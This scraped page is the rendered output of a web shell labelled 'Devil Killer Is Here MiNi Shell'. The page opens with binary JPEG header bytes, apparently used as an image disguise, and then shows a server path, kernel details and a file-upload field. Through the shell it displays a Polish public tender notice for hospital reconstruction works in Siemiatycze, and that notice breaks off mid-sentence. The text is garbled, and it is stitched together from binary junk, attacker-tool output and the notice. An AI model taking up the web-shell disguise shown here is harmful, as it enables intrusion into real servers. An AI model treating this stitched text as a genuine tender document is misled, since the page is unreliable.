JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220614/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220614/0020854101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Przebudowa, rozbudowa, nadbudowa i zmiana sposobu użytkowania pomieszczeń po dawnej centralnej sterylizacji na potrzeby Pododdziału Ortopedycznego oraz istniejących pomieszczeń kuchni na potrzeby </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Samodzielny Publiczny Zakład Opieki Zdrowotnej w Siemiatyczach</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Samodzielny Publiczny Zakład Opieki Zdrowotnej w Siemiatyczach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 050653482</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">www.spzozsiemiatycze.pl</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Siemiatycze</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">17-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL842 - Łomżyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@spzozsiemiatycze.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://spzozsiemiatycze.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Przebudowa, rozbudowa, nadbudowa i zmiana sposobu użytkowania pomieszczeń po dawnej centralnej sterylizacji na potrzeby Pododdziału Ortopedycznego oraz istniejących pomieszczeń kuchni na potrzeby </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-81128883-eb02-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00208541</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00037152/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Przebudowa, rozbudowa, nadbudowa i zmiana sposobu użytkowania pomieszczeń po dawnej centralnej sterylizacji na potrzeby Pododdziału Ortopedycznego oraz istniejących pomieszczeń kuchni na potrzeby</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> RPO Województwa Podlaskiego na lata 2014-2020: WND-RPPD.08.04.01-20-0085/20 pod nazwą: „Poprawa jakości usług medycznych w zakresie leczenia schorzeń układu kostno – stawowo – mięśniowego, w tym diagnostyki obrazowej świadczonych przez SPZOZ w Siemiatyczach </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-81128883-eb02-11ec-9a86-f6f4c648a056 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja pomiędzy Wykonawcą a Zamawiającym w tym składanie ofert odbywa<br/>się przy użyciu platformy http://ezamowienia.gov.pl.<br/>2. Wykonawca, który będzie ubiegał się o niniejsze zamówienie publiczne jest zobowiąza7. Zamawiający dopuszcza przesłanie<br/>wezwań do wyjaśnienia treści ofert; wyjaśnień rażąco niskiej ceny, uzupełnień dokumentów podmiotowych; wezwań odnośnie<br/>przedłużenia związania ofertą; informacji z otwarcia ofert i o wyborze oferty; lub wezwań do poprawy omyłek pisarskich i<br/>rachunkowych; zawiadomienia o unieważnieniu postępowania; zawiadomień o odrzuceniu ofert za pomocą<br/>zamowienia.publiczne@spzozsiemiatycze.pl lub poprzez http://ezamowienia.gov.pl.ny do założenia konta na w/w platformie.<br/><br/>Szczegółowy opis zawiera Rozdział II SWZ</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">3. Wykonawca dla pełnego korzystania<br/>z platformy powinien zweryfikować konto oraz nadać pełne uprawnienia dla użytkowników/osób uprawnionych po jego stronie do<br/>składania ofert.<br/>4. Opis weryfikacji konta oraz nadawania uprawnień zawiera instrukcja użytkownika dostępna na stronie platformy w dziale FAQ<br/>https://ezamowienia.gov.pl/soz/faqs<br/>oraz https://ezamowienia.gov.pl/pl/instrukcje-interaktywn_category/dla-wykonawcy/.<br/>Sposób przesyłania dokumentów i ich podpisywania opisany jest w instrukcjach znajdujących się na stronie:<br/>https://ezamowienia.gov.pl/pl/komponent-edukacyjny/.<br/>9. Osobami po stronie Zamawiającego do kontaktu w kwestiach wyjaśnienia treści SWZ jest Pan Krzysztof Prochowicz oraz Paweł<br/>Kosiński.<br/>10. Zamawiający nie dopuszczą telefonicznego udzielania wyjaśnień.<br/>Szczegółowy opis zawiera Rozdział II SWZ<br/>12.	Zamawiający dopuszcza zamieszczanie informacji/zawiadomień oraz udzielanie odpowiedzi o wyjaśnienie treści SWZ jeżeli storna prowadzonego zamówienia tj http://ezamowienia.gov.pl ulegnie awarii lub zamieszczanie informacji za jej pośrednictwem nie będzie możliwe. W powyższej sytuacji informacje będą publikowane za pomocą strony internetowej Zamawiającego http://spzozsiemiatycze.pl w zakładce zamówienia publiczne/aktualne postepowania. <br/>Szczegółowy opis zawiera Rozdział II SWZ postepowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zamawiający informuje, że Administratorem danych osobowych Wykonawcy jest SPZOZ w Siemiatyczach, ul. Szpitalna 8, 17-300 Siemiatycze;<br/>2.	W sprawach związanych z przetwarzaniem danych osobowych, można kontaktować się z Inspektorem Ochrony Danych Osobowych, za pośrednictwem adresu e-mail: Iodo@spzozsiemiatycze.pl;. <br/>3.	Dane osobowe takie jak imię, nazwisko, nazwa, adres siedziby/korespondencyjny, telefon, adres mail będą przetwarzane w celu przeprowadzenia postępowania o udzielenie zamówienia publicznego oraz w celu archiwizacji. <br/>4.	Podstawę prawną przetwarzania danych osobowych zgodnie z art. 6 ust. 1 lit. c) Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych, Dz. Urz. UE. L z 2016, nr 119, str. 1 z późn. zm., dalej RODO) stanowi ustawa z dnia 11.09.2019 r. Prawo zamówień publicznych (t. j. Dz. U. z 2021, poz. 1129 z późn. zm. – dalej PZP), wydane na jej podstawie akty wykonawcze, a także ustawa z dnia 14.07.1983 r. o narodowym zasobie archiwalnym i archiwach (t. j. Dz. U. z 2020, poz. 164 z późn. zm.). <br/>5.	Dane osobowe będą ujawniane pozostałym Wykonawcom oraz wszystkim zainteresowanym z uwzględnieniem przepisów w zakresie zamówień publicznych, a także podmiotom przetwarzającym dane na podstawie zawartych z Zamawiającym umów. <br/>6.	Dane osobowe Wykonawcy będą przechowywane przez okres obowiązywania umowy a następnie 5 lat, albo 15 lat w przypadku zamówień współfinansowanych ze środków UE, począwszy od 1 stycznia roku kalendarzowego następującego po zakończeniu okresu obowiązywania umowy. Okresy przechowywania dokumentacji dotyczą również Wykonawców, którzy złożyli oferty i nie zostały one uznane, jako najkorzystniejsze (nie zawarto z tymi Wykonawcami umowy). <br/>7.	Osobie, której dane dotyczą przysługuje prawo: <br/>- dostępu do danych. W przypadku, gdy wykonanie obowiązku związanego z prawem dostępu do danych wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu; <br/>- sprostowania danych, ograniczenia przetwarzania na warunkach określonych w przepisach RODO. Wystąpienie z żądaniem ograniczenia przetwarzania, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu;<br/> - wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych.<br/>8.	Osobie, której dane dotyczą nie przysługuje prawo:<br/>- usunięcia danych osobowych;<br/>- żądania przeniesienia danych osobowych.<br/>9.	W odniesieniu do podanych danych osobowych Wykonawcy, decyzje nie będą podejmowane w sposób zautomatyzowany.<br/>10.	Podanie danych osobowych jest dobrowolne, jednakże ich niepodanie może uniemożliwić Zamawiającemu dokonanie oceny spełniania warunków udziału w postępowaniu oraz zdolności Wykonawcy do należytego wykonania zamówienia, co skutkować może wykluczeniem Wykonawcy z postępowania lub odrzuceniem jego oferty.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SP ZOZ ZP/07/22</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest realizacja zadania pn. „Przebudowa, rozbudowa, nadbudowa i zmiana sposobu użytkowania pomieszczeń po dawnej centralnej sterylizacji na potrzeby Pododdziału Ortopedycznego oraz istniejących pomieszczeń kuchni na potrzeby Oddziału Jednego Dnia”<br/>2.	Zakres prac planowanej inwestycji:<br/>- roboty rozbiórkowe (częściowa rozbiórka istniejącego budynku),<br/>- roboty konstrukcyjne (żelbetowe, murowe z elementami konstrukcji stalowych),<br/>- roboty pokrywcze (dostosowanie istniejącego pokrycia dachowego do przepisów ppoż i budowlanych),<br/>- roboty wykończeniowe,<br/>- roboty instalacyjne ( sanitarne i elektryczne),<br/>- wyniesienie z pomieszczeń kuchni znajdującego się tam sprzętu wraz z piecami/kotłami i umieszczenie ich w miejscu wskazanym przez Zamawiającego,<br/>- dostawa i montaż/instalacji, wyposażenia drobnego/dodatkowego - pod tym pojęciem Zamawiający rozumie:<br/>a.	Montaż wyposażenia wandaloodpornego ze stali nierdzewnej dla niepełnosprawnych należy przewidzieć w pomieszczeniu 1.09 i 1.28. Jako wyposażenie przewiduje się: zestaw przy prysznicu – krzesełko odkładane nierdzewne z „ciepłym” siedziskiem, pochwyt kątowy poziomy z elementem pionowym montowanym do ściany i drugi pochwyt pionowy. Zestaw przy umywalce - 2 szt. pochwyty mocowane do ścian poziome, lustro, uchylny zestaw przy wc - uchwyt uchylny do wc i uchwyt poziomy – mocowanie do ściany. Nie dopuszcza się montażu zestawów do posadzki.<br/>b.	Zestawy przyumywalkowe w ilości umywalek, zestawy natryskowe w ilości natrysków, zestawy wc w ilości muszli ustępowych wc.<br/>c.	Wycieraczki - wymiary to 80x120 cm.<br/>d.	Odgruzowanie kanałów wentylacyjnych. Zakres dotyczy wszystkich istniejących kanałów wentylacji grawitacyjnej, znajdującej się w części oddziału ortopedycznego. Remont kanałów kominów grawitacyjnych- 16 szt.<br/>e.	Dostawa i montaż prowadnic wraz z kotarami wchodzi w zakres zamówienia: I etap: 5 szt. 145x200 i 1 szt. 220x200; II etap: 2 szt. 245x200 i 1 szt. 145 x200. Całość jako system jednego producenta składający się z: kotary bawełniano-poliestrowej w kolorystyce (6 kolorów do wyboru przez Zamawiającego - łosiowy, biały, niebieski jasny, niebieski ciemny, seledynowy i żółty); wykonanej z anodowanego aluminium szyny prowadnicy wraz z łukiem i guzikiem dostępu do szyny, zaczepów z haczykami z nylonu (min. 10 szt. na 1 mb), tuby montażowej aluminiowej z regulacją zawiesia - tuba wyposażona w systemowe przejście przez sufit podwieszany.<br/>f.	Należy zamontować pojemniki na ręczniki do rąk. Nie przewiduje się montażu suszarek.<br/>g.	Wykonawca dostarczy oraz o ile jest to wymagane zainstaluje/zamontuje wyposażenie dodatkowe przewidywane wielobranżową dokumentacją projektową (lustra; haczyki; tabliczka informacyjna przydrzwiowa; napisy nad drzwiami oraz inne elementy wymienione wielobranżową dokumentacją, a nie wymienione niniejszym OPZ).<br/>h.	Sprzęt p.poż. znaki p.poż. i instrukcję bezpieczeństwa.<br/>i.	Pozostałe elementy stanowiące wyposażenie drobne/dodatkowe nie wymienione OPZ, a uwzględnione/wymienione wielobranżową dokumentacją projektową. <br/><br/>Niniejszy opis nie stanowi katalogu zamkniętego. Wykonawca przy prawidłowej kalkulacji oferty oraz późniejszym wykonywaniu zamówienia jest zobligowany do stosowania wytycznych wielobranżowej dokumentacji projektowej zarówno w zakresie wykonywanych prac oraz dostaw/instalacji/montażu wyposażenia drobnego/dodatkowego.<br/>3.	Szczegółowy/pełny opis przedmiotu zamówienia został opisany na podstawie art. 103 ust. 1 PZP jako wielobranżowa dokumentacja robót budowlanych, stanowiąca załącznik nr 1 do SWZ.<br/>4.	Wykonawca jest zobligowany do wykonania wszelkich prac opisanych wielobranżową dokumentacją projektową, a nie wymienionych w przedmiarach robót. Co oznacza nadrzędność projektu budowlanego nad przedmiarami robót. <br/>5.	Wielobranżowa dokumentacja projektowa, a zwłaszcza projekt budowlano - wykonawczy stanowi integralną część SWZ oraz przyszłej umowy. W odniesieniu do przyszłej zawartej umowy art. 648 § 2 KC ustawy z dnia 23 kwietnia 1964 r. Kodeks cywilny (t. j. Dz. U. z 2020, poz. 1740 z późn. zm.) stosuje się odpowiednio.<br/>6.	Wielobranżowa dokumentacja budowlana w tym przedmiary, zawiera prace podzielone na etap I oraz etap II. Wykonawca zobowiązany jest wykonać wszelkie prace związane z powyższymi etapami.<br/>7.	Roboty budowlane należy prowadzić zgodnie z wymogami dokumentacji określającej przedmiot zamówienia (załącznik nr 1) oraz wymogami niniejszej SWZ i zawartej umowy. <br/>8.	Wszystkie prace winny być zrealizowane zgodnie z przepisami prawa, obowiązującymi normami, warunkami technicznymi i sztuką budowlaną, przepisami bhp, ppoż., a także zgodnie z poleceniami inspektora nadzoru, projektanta oraz w uzgodnieniu z Zamawiającym.<br/>9.	Prace konieczne i niezbędne dla wykonania przedmiotu zamówienia, a nieobjęte przedmiarami robót nie stanowią robót dodatkowych. Wykonawca prac analizując dokumentacje projektową winien te roboty przewidzieć na etapie składania oferty i ująć je w swoich kosztach. Załączony do SWZ przedmiar robót (stanowi część wielobranżowej dokumentacji robót budowlanych) jest tylko elementem pomocniczym do przygotowania oferty i na jego podstawie Oferent nie może ubiegać się o roboty dodatkowe czy też roboty towarzyszące lub uzupełniające. Oferta ma status oferty ryczałtowej przy kalkulacji której Oferent ma obowiązek uwzględnić wszystkie roboty nie ujęte w przedmiarze oraz roboty towarzyszące a wynikające z dokumentacji projektowej, a także inne prace wynikające z prawidłowego i zgodnego z projektem oraz sztuką budowlaną wykonania przedmiotu zamówienia. <br/>10.	Prace towarzyszące i roboty tymczasowe Wykonawca uwzględni w kosztach ogólnych kontraktu w tym m.in. koszty: opłat za ewentualne zajęcie pasa drogowego, wykonania dokumentacji powykonawczej wraz z wersją elektroniczną, zabezpieczenia dojazdu ciężkiego sprzętu i dostaw materiałów na teren budowy, odtworzenia zniszczonych nawierzchni ciągów komunikacyjnych użytkowanych podczas trwania kontraktu oraz poniesienia konsekwencji ewentualnych innych szkód powstałych w trakcie robót, robót tymczasowych (zorganizowanie i zlikwidowania zaplecza dla potrzeb budowy, w tym wydzielenie pomieszczeń dla inspektorów nadzoru w zapleczu Wykonawcy, doprowadzenie wody, energii elektrycznej, odprowadzenie ścieków, zabezpieczenie zaplecza i budowy przed dostępem osób postronnych w tym wykonanie niezbędnych wygrodzeń i zabezpieczeń placu budowy), energii elektrycznej i wody zużytej na potrzeby realizacji zamówienia a także inne prace i czynności związane z przestrzeganiem przepisów bhp oraz przepisów p.pożarowych.<br/>11.	Wykonawca w ramach zamówienia zobowiązuje się dostarczyć na swój koszt i ryzyko materiały niezbędne do wykonania przedmiotu zamówienia. Wykonawca zabezpieczy i odpowiednio opakuje materiały niezbędne do wykonania przedmiotu zamówienia.<br/>12.	Wszystkie materiały użyte do realizacji przedmiotu zamówienia muszą posiadać dokumenty potwierdzające ich dopuszczalność do obrotu i powszechnego stosowania w budownictwie oraz w obiektach użyteczności publicznej – w szczególności w obiektach służby zdrowia, oraz być zgodne z wymogami zawartymi w SWZ oraz projekcie budowlano-wykonawczym, wielobranżowej dokumentacji robót budowlanych i przedmiarach. <br/>13.	Wykonawca zobowiązuje się wykonać przedmiot zamówienia przy użyciu materiałów zgodnych z dokumentacją przetargową. Zastosowane materiały winny posiadać certyfikaty, deklaracje właściwości użytkowych lub deklaracje zgodności, atesty oraz być zgodne z kryteriami technicznymi zawartymi w specyfikacjach technicznych wykonania i odbioru robót budowlanych i powinny być zgodne z właściwymi przepisami obowiązującymi w okresie realizacji zamówienia.<br/>14.	Wykonawca zobowiązany będzie do wywiezienia materiałów z rozbiórki na własny koszt oraz ich utylizację zgodnie z obowiązującymi przepisami w zakresie ochrony środowiska. Wykonawca zobowiązany będzie do przedłożenia Zamawiającemu dokumentów potwierdzających utylizację materiałów z rozbiórki w ilościach odpowiadających faktycznemu zakresowi wykonanych prac rozbiórkowych.<br/>15.	Wykonawca zobowiązany będzie do zabezpieczenia terenu przed ewentualnymi zniszczeniami we własnym zakresie oraz do zapewnienia bezpiecznego przejścia w miejscach wykonywanych robót, przy zachowaniu najwyższej staranności przy wykonywaniu zadania na własny koszt uwzględniony w ofercie. Za wszystkie wymienione powyżej czynności i zabezpieczenia oraz realizację prac koniecznych do wykonania - a nie wykazanych w przedmiarach robót - Wykonawca nie może ubiegać się o dodatkowe wynagrodzenie u Zamawiającego– z tytułu tych czynności i prac uzupełniających a niezbędnych do wykonania zamówienia podstawowego – wynikającego z zawartej umowy.<br/>16.	Usterki i szkody powstałe w trakcie realizacji zadania będą usuwane natychmiast po ich powstaniu przez Wykonawcę na jego koszt. <br/>17.	Prace budowlane mają przebiegać w sposób nie zakłócający pracy Szpitala. Zamawiający dopuszcza możliwość wykonywania prac codziennie w godzinach od 07.00 do 20.00. <br/>18.	Obiekt jest objęty ochroną konserwatorską. Wymagania stawiane Wykonawcy: <br/>a) Wykonawca przed przystąpieniem do opracowania oferty ma obowiązek zapoznać się z dokumentacją stanowiącą opis przedmiotu zamówienia. <br/>b) Wykonawca odpowiedzialny będzie za całokształt, w tym za przebieg oraz terminowe wykonanie zamówienia, za jakość, zgodność z warunkami technicznymi i jakościowymi, a także warunkami bhp. p.poż. i sanitarno-epidemiologicznymi określonymi dla przedmiotu zamówienia. <br/>19.	Wykonawca zobowiązany będzie do zachowania najwyższej staranności przy wykonywaniu zadania. <br/>20.	Roboty ulegające zakryciu lub zanikowi wymagają zgłoszenia do odbioru na bieżąco u inspektora nadzoru, poprzez wpis do dziennika budowy. <br/><br/>Szczegółowy opis zawiera Rozdział IV do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33000000-0 - Urządzenia medyczne, farmaceutyki i produkty do pielęgnacji ciała</p> <p class="mb-0">32000000-3 - Sprzęt radiowy, telewizyjny, komunikacyjny, telekomunikacyjny i podobny</p> <p class="mb-0">31000000-6 - Maszyny, aparatura, urządzenia i wyroby elektryczne; oświetlenie</p> <p class="mb-0">30000000-9 - Maszyny biurowe i liczące, sprzęt i materiały, z wyjątkiem mebli i pakietów oprogramowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przywiduje zakres robót podobnych na poziomie 10% Zamówienia podstawowego<br/>Zakres będzie obejmował prace powiązane z przedmiotem zamówienia<br/>•	Roboty montażowe<br/>•	Roboty instalacyjne<br/>•	Roboty wykończeniowe<br/>•	Roboty 